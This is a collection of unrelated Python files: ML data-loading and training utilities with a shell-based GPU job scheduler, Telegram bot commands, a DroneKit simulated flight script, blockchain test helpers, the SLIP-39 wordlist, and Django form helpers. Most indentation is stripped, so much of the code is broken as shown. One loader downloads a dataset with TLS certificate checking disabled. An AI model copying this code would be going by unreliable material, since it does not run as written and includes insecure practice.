tv.transforms.ToTensor(),
dequantize
])
if test_transform is None:
if task in ("classification", "hybrid"):
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
])
else: # `density`.
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize
])
if data_name == "mnist":
train_data = tv.datasets.MNIST(
root, train=True, transform=train_transform, target_transform=train_target_transform, download=True
)
test_data = tv.datasets.MNIST(
root, train=False, transform=test_transform, target_transform=test_target_transform, download=True
)
elif data_name == "kmnist": # `kmnist`
train_data = tv.datasets.KMNIST(
root, train=True, transform=train_transform, target_transform=train_target_transform, download=True
)
test_data = tv.datasets.KMNIST(
root, train=False, transform=test_transform, target_transform=test_target_transform, download=True
)
else: # `fmnist`
train_data = tv.datasets.FashionMNIST(
root, train=True, transform=train_transform, target_transform=train_target_transform, download=True
)
test_data = tv.datasets.FashionMNIST(
root, train=False, transform=test_transform, target_transform=test_target_transform, download=True
)
elif data_name in ("cinic10", "cinic"):
# Statistics from https://github.com/BayesWatch/cinic-10#data-loading
mean, std = (0.47889522, 0.47227842, 0.43047404), (0.24205776, 0.23828046, 0.25874835)
if train_transform is None:
if task in ("classification", "hybrid"):
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else:
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else: # `density`.
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.ToTensor(),
dequantize,
])
else:
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize,
])
if test_transform is None:
if task in ("classification", "hybrid"):
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else: # `density`.
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize
])
        # Hard-coded download logic: fetch and extract the CINIC-10 archive if it is not already present locally.
cinic_path = os.path.join(root, 'cinic-10')
if not os.path.exists(cinic_path):
cinic_link = "https://datashare.is.ed.ac.uk/bitstream/handle/10283/3192/CINIC-10.tar.gz"
os.system(f'wget -P {root} {cinic_link} --no-check-certificate')
os.system(f'tar -xf {root}/CINIC-10.tar.gz')
# Exclude the CIFAR-10 part in CINIC-10, since it's a hybrid of the original CIFAR-10 and Imagenet!
if kwargs.get('exclude_cifar', False):
is_valid_file = lambda _path: 'cifar10' not in _path
else:
is_valid_file = None
train_data = tv.datasets.ImageFolder(
os.path.join(cinic_path, 'train'),
transform=train_transform, target_transform=train_target_transform, is_valid_file=is_valid_file
)
test_data = tv.datasets.ImageFolder(
os.path.join(cinic_path, 'test'),
transform=test_transform, target_transform=test_target_transform, is_valid_file=is_valid_file
)
else:
raise NotImplementedError(f"Unknown dataset: {data_name}.")
train_loader = data.DataLoader(
train_data,
batch_size=train_batch_size,
drop_last=drop_last,
shuffle=shuffle,
pin_memory=pin_memory,
num_workers=num_workers
)
test_loader = data.DataLoader(
test_data,
batch_size=test_batch_size,
drop_last=False,
shuffle=False,
pin_memory=pin_memory,
num_workers=num_workers
)
return train_loader, test_loader
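# Illustrative usage sketch (not part of the original module): build CIFAR-10 loaders for a
# classification run and iterate one epoch worth of batches (downloads the data on first use).
def _example_get_loader():
    train_loader, test_loader = get_loader(
        "cifar10", train_batch_size=128, test_batch_size=512, task="classification"
    )
    for images, labels in train_loader:
        pass  # Forward/backward pass would go here.
    print(f"train examples: {count_examples(train_loader)}, test examples: {count_examples(test_loader)}")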
def count_examples(loader: data.DataLoader):
"""Count the number of examples in a dataloader."""
count = 0
for batch in loader:
unpacked = batch
while not torch.is_tensor(unpacked):
unpacked = unpacked[0]
count += unpacked.size(0)
return count
class InfiniteLoader(object):
"""Wraps an existing loader so that it outputs stuff indefinitely; useful for semi-supervised learning."""
def __init__(self, loader: data.DataLoader):
super(InfiniteLoader, self).__init__()
self.loader = loader
self.iterator = iter(loader)
def __next__(self):
try:
return next(self.iterator)
except StopIteration:
self.iterator = iter(self.loader)
return next(self.iterator)
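# Illustrative usage sketch (not part of the original module): draw labeled and unlabeled
# batches in lockstep, letting the (typically smaller) unlabeled loader cycle indefinitely.
def _example_infinite_loader(labeled_loader: data.DataLoader, unlabeled_loader: data.DataLoader):
    unlabeled_iter = InfiniteLoader(unlabeled_loader)
    for labeled_batch in labeled_loader:
        unlabeled_batch = next(unlabeled_iter)
        del labeled_batch, unlabeled_batch  # Training step would go here.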
def get_ema_avg_fn(gamma=0.999):
def ema_avg_fn(averaged_model_parameter, model_parameter, num_averaged):
"""Used for `torch.optim.swa_utils.AveragedModel`."""
return gamma * averaged_model_parameter + (1. - gamma) * model_parameter
return ema_avg_fn
class Comparator(object):
def __init__(self, highest=True):
super(Comparator, self).__init__()
self._highest = highest
self._best = (-sys.maxsize) if highest else sys.maxsize
self._aux = {}
def step(self, x, **kwargs) -> bool:
"""Update the internal state if `x` is better than the best recorded so far.
Keyword Args are used to record auxiliary information.
Returns:
True if the internal state is updated; False otherwise.
"""
if self._highest and x <= self._best:
return False
if not self._highest and x >= self._best:
return False
self._best = x
self._aux = kwargs
return True
@property
def val(self):
return self._best, self._aux
class EarlyStopper(object):
"""An object that helps with early stopping."""
def __init__(self, patience, want_max=True):
super(EarlyStopper, self).__init__()
self.patience = patience
self.want_max = want_max
self.flat_cnt = 0
best = sys.maxsize
if want_max:
best = -best
self.best = best
def step(self, val) -> bool:
"""Given the current metric, return if the loop should break."""
if self.patience is None:
return False
if self.want_max:
if val <= self.best:
self.flat_cnt += 1
if self.flat_cnt >= self.patience:
return True
else:
self.best = val
self.flat_cnt = 0
else:
if val >= self.best:
self.flat_cnt += 1
if self.flat_cnt >= self.patience:
return True
else:
self.best = val
self.flat_cnt = 0
return False
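# Illustrative usage sketch (not part of the original module): stop training once the validation
# metric has not improved for `patience` consecutive evaluations.
def _example_early_stopper(val_metrics: Sequence[float]):
    stopper = EarlyStopper(patience=5, want_max=True)
    for epoch, metric in enumerate(val_metrics):
        if stopper.step(metric):
            print(f"early stopping at epoch {epoch}")
            break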
# Misc log sanitization.
def early_stopping(global_steps: list, metrics: list, tolerance: int, ascending: bool):
"""Find the index s.t. quant is best.
Searches sequentially and stops when the traversed global steps in `gs` passes `tolerance` level.
Args:
global_steps: A list of global steps.
metrics: A list of validation metrics.
tolerance: The max number of steps before searching is stopped.
ascending: Finds max metric if True; else finds the min.
Returns:
An integer index for the best position.
"""
assert all(i > j for i, j in zip_(global_steps[1:], global_steps[:-1])), "`global_steps` is not increasing."
counts = 0 # The number of impatient steps.
best = metrics[0]
global_step_prev = global_steps[0]
for i, (global_step, metric) in enumerate(
zip_(global_steps[1:], metrics[1:])
):
if ascending:
if metric <= best:
counts += (global_step - global_step_prev)
if counts >= tolerance:
break
else:
best = metric
counts = 0
else:
if metric >= best:
counts += (global_step - global_step_prev)
if counts >= tolerance:
break
else:
best = metric
counts = 0
global_step_prev = global_step
return metrics.index(best)
# Convenience aliases.
write_argparse = write_config
load_argparse = load_config
count_tensor_or_tensors_size = count_tensor_list_size
# Safe math operations.
def exp_(x):
try:
ans = math.exp(x)
except OverflowError:
ans = float('inf')
return ans
# Run on cloud.
def extract_argument(cmd: str, arg="--train_dir"):
lo = cmd.find(arg)
start = lo + len(arg)
end = None # Until the last.
for index in range(start, len(cmd) - 1):
if cmd[index:index + 2] == '--':
end = index
break
return cmd[start:end].strip()
def gpu_scheduler(
commands: Sequence[str],
wait_time_in_secs: int = 180,
log=True,
maxMemory=1e-4,
maxLoad=1e-4,
excludeID=(),
excludeUUID=()
):
"""Schedule jobs on a VM with several GPUs.
Args:
commands: Sequence of strings. Each string is a command of the format:
python -m <script> <args>
Notes:
1) This command shouldn't contain CUDA_VISIBLE_DEVICES, since it gets added in this function.
2) It is the responsibility of each command to get the wait/no wait right!
wait_time_in_secs: The number of seconds to wait before scheduling the next job.
It's always good to wait for a bit, since a job might not immediately start running a GPU.
log: Write all logs to `train_dir/log.out` if True. So assumes command has `--train_dir` argument.
"""
print(f'Scheduling {len(commands)} jobs...')
import GPUtil
import subprocess
procs = []
for job_id, command in enumerate(commands):
empty_gpus = []
while len(empty_gpus) == 0:
# Don't use `getFirstAvailable`; it is very bad since it throws RuntimeError when no GPU is found.
empty_gpus = GPUtil.getAvailable(
order='first',
maxLoad=maxLoad,
maxMemory=maxMemory,
limit=1,
excludeID=excludeID,
excludeUUID=excludeUUID,
)
time.sleep(1)
print(f'empty gpus: {empty_gpus}')
gpu_id = empty_gpus[0]
command = f"export CUDA_VISIBLE_DEVICES={gpu_id}; {command}"
command = command.strip() # Need this strip to remove new line char.
if log and '--train_dir' in command:
# Get argument for `train_dir`.
train_dir = extract_argument(command)
log_path = os.path.join(train_dir, 'log.out')
command += f" > {log_path} 2>&1 "
command = f"mkdir -p {train_dir}; \n{command}"
# This doesn't wait.
proc = subprocess.Popen(
[command],
shell=True, stdin=None, stdout=None, stderr=None, close_fds=True
)
procs.append(proc)
print('command: ')
print(command)
print(f'scheduled job: {job_id} on gpu: {gpu_id}')
# Give the program some time to be located on the GPU, before scheduling the next.
time.sleep(wait_time_in_secs)
return procs
|
from telegram import Update
from telegram.ext import CallbackContext, CommandHandler
from bot.settings import settings
from bot.utils import get_log
from ._utils import require_owner
log = get_log(__name__)
@require_owner
def command(update: Update, context: CallbackContext):
log.debug('Taken command `settings`')
update.message.reply_markdown('Current VK configuration:\n\n'
f'`APP ID: {settings.VK_APP_ID}`\n'
f'`Group ID: {settings.VK_WALL_ID}`\n'
f'`Access Token: {settings.VK_APP_TOKEN}`\n\n'
'Call /config to update it.')
handler = CommandHandler('settings', command)
|
from telethon.errors.rpcerrorlist import BotInlineDisabledError as noinline
from telethon.errors.rpcerrorlist import YouBlockedUserError
from telethon.tl.functions.contacts import UnblockRequest
from userbot import BOT_USERNAME
from userbot import CMD_HANDLER as cmd
from userbot import bot
from userbot.utils import edit_or_reply, man_cmd
@man_cmd(pattern="helpme")
async def _(event):
if event.fwd_from:
return
if BOT_USERNAME is not None:
chat = "@Botfather"
try:
results = await event.client.inline_query(BOT_USERNAME, "@MikooUserbot")
await results[0].click(
event.chat_id, reply_to=event.reply_to_msg_id, hide_via=True
)
await event.delete()
except noinline:
xx = await edit_or_reply(
event,
"**Inline Mode Tidak aktif.**\n__Sedang Menyalakannya, Harap Tunggu Sebentar...__",
)
async with bot.conversation(chat) as conv:
try:
first = await conv.send_message("/setinline")
second = await conv.get_response()
third = await conv.send_message(BOT_USERNAME)
fourth = await conv.get_response()
fifth = await conv.send_message("Search")
sixth = await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
except YouBlockedUserError:
await event.client(UnblockRequest(chat))
first = await conv.send_message("/setinline")
second = await conv.get_response()
third = await conv.send_message(BOT_USERNAME)
fourth = await conv.get_response()
fifth = await conv.send_message("Search")
sixth = await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await xx.edit(
f"**Berhasil Menyalakan Mode Inline**\n\n**Ketik** `{cmd}helpme` **lagi untuk membuka menu bantuan.**"
)
await bot.delete_messages(
conv.chat_id,
[first.id, second.id, third.id, fourth.id, fifth.id, sixth.id],
)
else:
await edit_or_reply(
event,
"**Silahkan Buat BOT di @BotFather dan Tambahkan Var** `BOT_TOKEN` & `BOT_USERNAME`",
)
|
##########DEPENDENCIES#############
from dronekit import connect, VehicleMode,LocationGlobalRelative,APIException
import time
import socket
#import exceptions
import math
import argparse
from pymavlink import mavutil
#########FUNCTIONS#################
def connectMyCopter():
parser = argparse.ArgumentParser(description='commands')
parser.add_argument('--connect')
args = parser.parse_args()
connection_string = args.connect
if not connection_string:
import dronekit_sitl
sitl = dronekit_sitl.start_default()
connection_string = sitl.connection_string()
vehicle = connect(connection_string,wait_ready=True)
return vehicle
def arm_and_takeoff(targetHeight):
    while not vehicle.is_armable:
print("Waiting for vehicle to become armable.")
time.sleep(1)
print("Vehicle is now armable")
vehicle.mode = VehicleMode("GUIDED")
while vehicle.mode!='GUIDED':
print("Waiting for drone to enter GUIDED flight mode")
time.sleep(1)
print("Vehicle now in GUIDED MODE. Have fun!!")
vehicle.armed = True
    while not vehicle.armed:
print("Waiting for vehicle to become armed.")
time.sleep(1)
print("Look out! Virtual props are spinning!!")
vehicle.simple_takeoff(targetHeight) ##meters
while True:
print("Current Altitude: %d"%vehicle.location.global_relative_frame.alt)
if vehicle.location.global_relative_frame.alt>=.92*targetHeight:
break
time.sleep(1)
print("Target altitude reached!!")
return None
##Send a velocity command with +x being the heading of the drone.
def send_local_ned_velocity(vx, vy, vz):
msg = vehicle.message_factory.set_position_target_local_ned_encode(
0,
0, 0,
mavutil.mavlink.MAV_FRAME_BODY_OFFSET_NED,
0b0000111111000111,
0, 0, 0,
vx, vy, vz,
0, 0, 0,
0, 0)
vehicle.send_mavlink(msg)
vehicle.flush()
##Send a velocity command in the local NED frame, with +x pointing true north (independent of heading).
def send_global_ned_velocity(vx, vy, vz):
msg = vehicle.message_factory.set_position_target_local_ned_encode(
0, # time_boot_ms (not used)
0, 0, # target system, target component
mavutil.mavlink.MAV_FRAME_LOCAL_NED, #frame
0b0000111111000111, #type_mask (only speeds enabled)
0, 0, 0, # x, y, z positions (not used)
vx, vy, vz, # x, y, z velocity in m/s
0, 0, 0, #x, y, z acceleration (not supported yet, ignored in GCS_Mavlink)
0, 0) #yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)
vehicle.send_mavlink(msg)
vehicle.flush()
##########MAIN EXECUTABLE###########
vehicle = connectMyCopter()
arm_and_takeoff(10)
time.sleep(2)
counter=0
while counter<5:
send_local_ned_velocity(2,0,0)
time.sleep(1)
print("Moving NORTH relative to front of drone")
counter=counter+1
time.sleep(2)
counter=0
while counter<5:
send_local_ned_velocity(0,-2,0)
time.sleep(1)
print("Moving WEST relative to front of drone")
counter=counter+1
time.sleep(2)
counter=0
while counter<5:
send_global_ned_velocity(2,0,0)
time.sleep(1)
print("Moving TRUE NORTH relative to front of drone")
counter=counter+1
time.sleep(2)
counter=0
while counter<5:
send_global_ned_velocity(0,-2,0)
time.sleep(1)
print("Moving TRUE WEST relative to front of drone")
counter=counter+1
#########UP AND DOWN############
time.sleep(2)
counter=0
while counter<5:
send_local_ned_velocity(0,0,-2)
time.sleep(1)
print("Moving UP")
counter=counter+1
time.sleep(2)
counter=0
while counter<5:
send_local_ned_velocity(0,0,2)
time.sleep(1)
print("Moving DOWN")
counter=counter+1
|
import pytest
from types import SimpleNamespace
from sovtoken.test.helpers.helper_inner_general import HelperInnerGeneral
from sovtoken.test.helpers.helper_inner_request import HelperInnerRequest
from sovtoken.test.helpers.helper_inner_wallet import HelperInnerWallet
from .helper_general import HelperGeneral
from .helper_node import HelperNode
from .helper_request import HelperRequest
from .helper_sdk import HelperSdk
from .helper_wallet import HelperWallet
def form_helpers(
txn_pool_node_set,
looper,
pool_handle,
trustee_wallets,
steward_wallets,
sdk_wallet_client,
sdk_wallet_steward,
sdk_wallet_handle,
sdk_trustees,
sdk_stewards
):
helper_node = HelperNode(txn_pool_node_set)
helper_sdk = HelperSdk(
looper,
pool_handle,
txn_pool_node_set,
sdk_wallet_steward
)
helper_inner_wallet = HelperInnerWallet(
looper,
sdk_wallet_client,
trustee_wallets,
steward_wallets
)
helper_wallet = HelperWallet(
looper,
sdk_wallet_client,
trustee_wallets,
steward_wallets,
sdk_wallet_handle,
sdk_trustees,
sdk_stewards
)
helper_requests = HelperRequest(
helper_wallet,
helper_sdk,
looper,
sdk_wallet_client,
sdk_wallet_steward
)
helper_general = HelperGeneral(helper_sdk, helper_wallet, helper_requests, helper_node)
helper_inner_requests = HelperInnerRequest(
helper_inner_wallet,
helper_sdk,
looper,
sdk_wallet_client,
sdk_wallet_steward
)
helper_inner_general = HelperInnerGeneral(helper_sdk, helper_inner_wallet, helper_inner_requests)
helpers = {
'inner': SimpleNamespace(**{
'general': helper_inner_general,
'request': helper_inner_requests,
'wallet': helper_inner_wallet,
}),
'general': helper_general,
'request': helper_requests,
'wallet': helper_wallet,
'sdk': helper_sdk,
'node': helper_node,
}
return SimpleNamespace(**helpers)
|
SLIP39_WORDS = [
"academic",
"acid",
"acne",
"acquire",
"acrobat",
"activity",
"actress",
"adapt",
"adequate",
"adjust",
"admit",
"adorn",
"adult",
"advance",
"advocate",
"afraid",
"again",
"agency",
"agree",
"aide",
"aircraft",
"airline",
"airport",
"ajar",
"alarm",
"album",
"alcohol",
"alien",
"alive",
"alpha",
"already",
"alto",
"aluminum",
"always",
"amazing",
"ambition",
"amount",
"amuse",
"analysis",
"anatomy",
"ancestor",
"ancient",
"angel",
"angry",
"animal",
"answer",
"antenna",
"anxiety",
"apart",
"aquatic",
"arcade",
"arena",
"argue",
"armed",
"artist",
"artwork",
"aspect",
"auction",
"august",
"aunt",
"average",
"aviation",
"avoid",
"award",
"away",
"axis",
"axle",
"beam",
"beard",
"beaver",
"become",
"bedroom",
"behavior",
"being",
"believe",
"belong",
"benefit",
"best",
"beyond",
"bike",
"biology",
"birthday",
"bishop",
"black",
"blanket",
"blessing",
"blimp",
"blind",
"blue",
"body",
"bolt",
"boring",
"born",
"both",
"boundary",
"bracelet",
"branch",
"brave",
"breathe",
"briefing",
"broken",
"brother",
"browser",
"bucket",
"budget",
"building",
"bulb",
"bulge",
"bumpy",
"bundle",
"burden",
"burning",
"busy",
"buyer",
"cage",
"calcium",
"camera",
"campus",
"canyon",
"capacity",
"capital",
"capture",
"carbon",
"cards",
"careful",
"cargo",
"carpet",
"carve",
"category",
"cause",
"ceiling",
"center",
"ceramic",
"champion",
"change",
"charity",
"check",
"chemical",
"chest",
"chew",
"chubby",
"cinema",
"civil",
"class",
"clay",
"cleanup",
"client",
"climate",
"clinic",
"clock",
"clogs",
"closet",
"clothes",
"club",
"cluster",
"coal",
"coastal",
"coding",
"column",
"company",
"corner",
"costume",
"counter",
"course",
"cover",
"cowboy",
"cradle",
"craft",
"crazy",
"credit",
"cricket",
"criminal",
"crisis",
"critical",
"crowd",
"crucial",
"crunch",
"crush",
"crystal",
"cubic",
"cultural",
"curious",
"curly",
"custody",
"cylinder",
"daisy",
"damage",
"dance",
"darkness",
"database",
"daughter",
"deadline",
"deal",
"debris",
"debut",
"decent",
"decision",
"declare",
"decorate",
"decrease",
"deliver",
"demand",
"density",
"deny",
"depart",
"depend",
"depict",
"deploy",
"describe",
"desert",
"desire",
"desktop",
"destroy",
"detailed",
"detect",
"device",
"devote",
"diagnose",
"dictate",
"diet",
"dilemma",
"diminish",
"dining",
"diploma",
"disaster",
"discuss",
"disease",
"dish",
"dismiss",
"display",
"distance",
"dive",
"divorce",
"document",
"domain",
"domestic",
"dominant",
"dough",
"downtown",
"dragon",
"dramatic",
"dream",
"dress",
"drift",
"drink",
"drove",
"drug",
"dryer",
"duckling",
"duke",
"duration",
"dwarf",
"dynamic",
"early",
"earth",
"easel",
"easy",
"echo",
"eclipse",
"ecology",
"edge",
"editor",
"educate",
"either",
"elbow",
"elder",
"election",
"elegant",
"element",
"elephant",
"elevator",
"elite",
"else",
"email",
"emerald",
"emission",
"emperor",
"emphasis",
"employer",
"empty",
"ending",
"endless",
"endorse",
"enemy",
"energy",
"enforce",
"engage",
"enjoy",
"enlarge",
"entrance",
"envelope",
"envy",
"epidemic",
"episode",
"equation",
"equip",
"eraser",
"erode",
"escape",
"estate",
"estimate",
"evaluate",
"evening",
"evidence",
"evil",
"evoke",
"exact",
"example",
"exceed",
"exchange",
"exclude",
"excuse",
"execute",
"exercise",
"exhaust",
"exotic",
"expand",
"expect",
"explain",
"express",
"extend",
"extra",
"eyebrow",
"facility",
"fact",
"failure",
"faint",
"fake",
"false",
"family",
"famous",
"fancy",
"fangs",
"fantasy",
"fatal",
"fatigue",
"favorite",
"fawn",
"fiber",
"fiction",
"filter",
"finance",
"findings",
"finger",
"firefly",
"firm",
"fiscal",
"fishing",
"fitness",
"flame",
"flash",
"flavor",
"flea",
"flexible",
"flip",
"float",
"floral",
"fluff",
"focus",
"forbid",
"force",
"forecast",
"forget",
"formal",
"fortune",
"forward",
"founder",
"fraction",
"fragment",
"frequent",
"freshman",
"friar",
"fridge",
"friendly",
"frost",
"froth",
"frozen",
"fumes",
"funding",
"furl",
"fused",
"galaxy",
"game",
"garbage",
"garden",
"garlic",
"gasoline",
"gather",
"general",
"genius",
"genre",
"genuine",
"geology",
"gesture",
"glad",
"glance",
"glasses",
"glen",
"glimpse",
"goat",
"golden",
"graduate",
"grant",
"grasp",
"gravity",
"gray",
"greatest",
"grief",
"grill",
"grin",
"grocery",
"gross",
"group",
"grownup",
"grumpy",
"guard",
"guest",
"guilt",
"guitar",
"gums",
"hairy",
"hamster",
"hand",
"hanger",
"harvest",
"have",
"havoc",
"hawk",
"hazard",
"headset",
"health",
"hearing",
"heat",
"helpful",
"herald",
"herd",
"hesitate",
"hobo",
"holiday",
"holy",
"home",
"hormone",
"hospital",
"hour",
"huge",
"human",
"humidity",
"hunting",
"husband",
"hush",
"husky",
"hybrid",
"idea",
"identify",
"idle",
"image",
"impact",
"imply",
"improve",
"impulse",
"include",
"income",
"increase",
"index",
"indicate",
"industry",
"infant",
"inform",
"inherit",
"injury",
"inmate",
"insect",
"inside",
"install",
"intend",
"intimate",
"invasion",
"involve",
"iris",
"island",
"isolate",
"item",
"ivory",
"jacket",
"jerky",
"jewelry",
"join",
"judicial",
"juice",
"jump",
"junction",
"junior",
"junk",
"jury",
"justice",
"kernel",
"keyboard",
"kidney",
"kind",
"kitchen",
"knife",
"knit",
"laden",
"ladle",
"ladybug",
"lair",
"lamp",
"language",
"large",
"laser",
"laundry",
"lawsuit",
"leader",
"leaf",
"learn",
"leaves",
"lecture",
"legal",
"legend",
"legs",
"lend",
"length",
"level",
"liberty",
"library",
"license",
"lift",
"likely",
"lilac",
"lily",
"lips",
"liquid",
"listen",
"literary",
"living",
"lizard",
"loan",
"lobe",
"location",
"losing",
"loud",
"loyalty",
"luck",
"lunar",
"lunch",
"lungs",
"luxury",
"lying",
"lyrics",
"machine",
"magazine",
"maiden",
"mailman",
"main",
"makeup",
"making",
"mama",
"manager",
"mandate",
"mansion",
"manual",
"marathon",
"march",
"market",
"marvel",
"mason",
"material",
"math",
"maximum",
"mayor",
"meaning",
"medal",
"medical",
"member",
"memory",
"mental",
"merchant",
"merit",
"method",
"metric",
"midst",
"mild",
"military",
"mineral",
"minister",
"miracle",
"mixed",
"mixture",
"mobile",
"modern",
"modify",
"moisture",
"moment",
"morning",
"mortgage",
"mother",
"mountain",
"mouse",
"move",
"much",
"mule",
"multiple",
"muscle",
"museum",
"music",
"mustang",
"nail",
"national",
"necklace",
"negative",
"nervous",
"network",
"news",
"nuclear",
"numb",
"numerous",
"nylon",
"oasis",
"obesity",
"object",
"observe",
"obtain",
"ocean",
"often",
"olympic",
"omit",
"oral",
"orange",
"orbit",
"order",
"ordinary",
"organize",
"ounce",
"oven",
"overall",
"owner",
"paces",
"pacific",
"package",
"paid",
"painting",
"pajamas",
"pancake",
"pants",
"papa",
"paper",
"parcel",
"parking",
"party",
"patent",
"patrol",
"payment",
"payroll",
"peaceful",
"peanut",
"peasant",
"pecan",
"penalty",
"pencil",
"percent",
"perfect",
"permit",
"petition",
"phantom",
"pharmacy",
"photo",
"phrase",
"physics",
"pickup",
"picture",
"piece",
"pile",
"pink",
"pipeline",
"pistol",
"pitch",
"plains",
"plan",
"plastic",
"platform",
"playoff",
"pleasure",
"plot",
"plunge",
"practice",
"prayer",
"preach",
"predator",
"pregnant",
"premium",
"prepare",
"presence",
"prevent",
"priest",
"primary",
"priority",
"prisoner",
"privacy",
"prize",
"problem",
"process",
"profile",
"program",
"promise",
"prospect",
"provide",
"prune",
"public",
"pulse",
"pumps",
"punish",
"puny",
"pupal",
"purchase",
"purple",
"python",
"quantity",
"quarter",
"quick",
"quiet",
"race",
"racism",
"radar",
"railroad",
"rainbow",
"raisin",
"random",
"ranked",
"rapids",
"raspy",
"reaction",
"realize",
"rebound",
"rebuild",
"recall",
"receiver",
"recover",
"regret",
"regular",
"reject",
"relate",
"remember",
"remind",
"remove",
"render",
"repair",
"repeat",
"replace",
"require",
"rescue",
"research",
"resident",
"response",
"result",
"retailer",
"retreat",
"reunion",
"revenue",
"review",
"reward",
"rhyme",
"rhythm",
"rich",
"rival",
"river",
"robin",
"rocky",
"romantic",
"romp",
"roster",
"round",
"royal",
"ruin",
"ruler",
"rumor",
"sack",
"safari",
"salary",
"salon",
"salt",
"satisfy",
"satoshi",
"saver",
"says",
"scandal",
"scared",
"scatter",
"scene",
"scholar",
"science",
"scout",
"scramble",
"screw",
"script",
"scroll",
"seafood",
"season",
"secret",
"security",
"segment",
"senior",
"shadow",
"shaft",
"shame",
"shaped",
"sharp",
"shelter",
"sheriff",
"short",
"should",
"shrimp",
"sidewalk",
"silent",
"silver",
"similar",
"simple",
"single",
"sister",
"skin",
"skunk",
"slap",
"slavery",
"sled",
"slice",
"slim",
"slow",
"slush",
"smart",
"smear",
"smell",
"smirk",
"smith",
"smoking",
"smug",
"snake",
"snapshot",
"sniff",
"society",
"software",
"soldier",
"solution",
"soul",
"source",
"space",
"spark",
"speak",
"species",
"spelling",
"spend",
"spew",
"spider",
"spill",
"spine",
"spirit",
"spit",
"spray",
"sprinkle",
"square",
"squeeze",
"stadium",
"staff",
"standard",
"starting",
"station",
"stay",
"steady",
"step",
"stick",
"stilt",
"story",
"strategy",
"strike",
"style",
"subject",
"submit",
"sugar",
"suitable",
"sunlight",
"superior",
"surface",
"surprise",
"survive",
"sweater",
"swimming",
"swing",
"switch",
"symbolic",
"sympathy",
"syndrome",
"system",
"tackle",
"tactics",
"tadpole",
"talent",
"task",
"taste",
"taught",
"taxi",
"teacher",
"teammate",
"teaspoon",
"temple",
"tenant",
"tendency",
"tension",
"terminal",
"testify",
"texture",
"thank",
"that",
"theater",
"theory",
"therapy",
"thorn",
"threaten",
"thumb",
"thunder",
"ticket",
"tidy",
"timber",
"timely",
"ting",
"tofu",
"together",
"tolerate",
"total",
"toxic",
"tracks",
"traffic",
"training",
"transfer",
"trash",
"traveler",
"treat",
"trend",
"trial",
"tricycle",
"trip",
"triumph",
"trouble",
"true",
"trust",
"twice",
"twin",
"type",
"typical",
"ugly",
"ultimate",
"umbrella",
"uncover",
"undergo",
"unfair",
"unfold",
"unhappy",
"union",
"universe",
"unkind",
"unknown",
"unusual",
"unwrap",
"upgrade",
"upstairs",
"username",
"usher",
"usual",
"valid",
"valuable",
"vampire",
"vanish",
"various",
"vegan",
"velvet",
"venture",
"verdict",
"verify",
"very",
"veteran",
"vexed",
"victim",
"video",
"view",
"vintage",
"violence",
"viral",
"visitor",
"visual",
"vitamins",
"vocal",
"voice",
"volume",
"voter",
"voting",
"walnut",
"warmth",
"warn",
"watch",
"wavy",
"wealthy",
"weapon",
"webcam",
"welcome",
"welfare",
"western",
"width",
"wildlife",
"window",
"wine",
"wireless",
"wisdom",
"withdraw",
"wits",
"wolf",
"woman",
"work",
"worthy",
"wrap",
"wrist",
"writing",
"wrote",
"year",
"yelp",
"yield",
"yoga",
"zero",
]
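# A small helper sketch (not part of the wordlist above): SLIP-39 uses a 1024-word list,
# so each word encodes exactly 10 bits. Assuming SLIP39_WORDS above is the complete,
# sorted list, a word <-> index mapping can be built like this.
SLIP39_WORD_INDEX = {word: index for index, word in enumerate(SLIP39_WORDS)}

def words_to_indices(mnemonic_words):
    """Map mnemonic words to their 10-bit indices, raising KeyError on unknown words."""
    return [SLIP39_WORD_INDEX[w] for w in mnemonic_words]

def indices_to_words(indices):
    """Map 10-bit indices (0..1023) back to mnemonic words."""
    return [SLIP39_WORDS[i] for i in indices]

# Example: words_to_indices(["academic", "acid"]) -> [0, 1]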
|
from django import forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
import commonware.log
from tower import ugettext as _
from mkt.site.utils import slug_validator
from .models import BlockedSlug, Webapp
log = commonware.log.getLogger('z.addons')
def clean_slug(slug, instance):
slug_validator(slug, lower=False)
slug_field = 'app_slug'
if slug != getattr(instance, slug_field):
if Webapp.objects.filter(**{slug_field: slug}).exists():
raise forms.ValidationError(
_('This slug is already in use. Please choose another.'))
if BlockedSlug.blocked(slug):
raise forms.ValidationError(
_('The slug cannot be "%s". Please choose another.') % slug)
return slug
def icons():
"""
Generates a list of tuples for the default icons for add-ons,
in the format (pseudo-mime-type, description).
"""
icons = [('image/jpeg', 'jpeg'), ('image/png', 'png'), ('', 'default')]
dirs, files = storage.listdir(settings.ADDON_ICONS_DEFAULT_PATH)
for fname in files:
if '32' in fname and 'default' not in fname:
icon_name = fname.split('-')[0]
icons.append(('icon/%s' % icon_name, icon_name))
return icons
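# Usage sketch (an assumption, not code from this module): the (pseudo-mime-type, description)
# tuples returned by icons() are shaped to drop straight into a Django ChoiceField. In practice
# the choices would typically be computed lazily rather than at import time.
class AddonIconForm(forms.Form):
    icon_type = forms.ChoiceField(choices=icons(), required=False)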
|
import glob
from fnmatch import fnmatch
from functools import cached_property
from os import path
from typing import List
class FileTreeNode(object):
"""
本类用于识别Python文件结构。
获取文件树,并排除用户指定过滤的部分。
关于文件结构的过滤功能都写在了这个文件夹里,包括以下内容:
#. 对于非 ``python package`` 的部分全部跳过;
#. 跳过由 ``.`` 和 ``_`` 开头的文件和文件夹,不过保留 ``__*__`` 格式的文件和文件夹;
#. 跳过 ``__pycache__`` 文件夹;
#. 跳过用户指定要排除的文件夹。
"""
SUFFIXES = ('.py', '.pyx', '.pyw')
CORE_NAME = '__init__'
def __init__(self, directory: str, exclude: List[str]):
"""
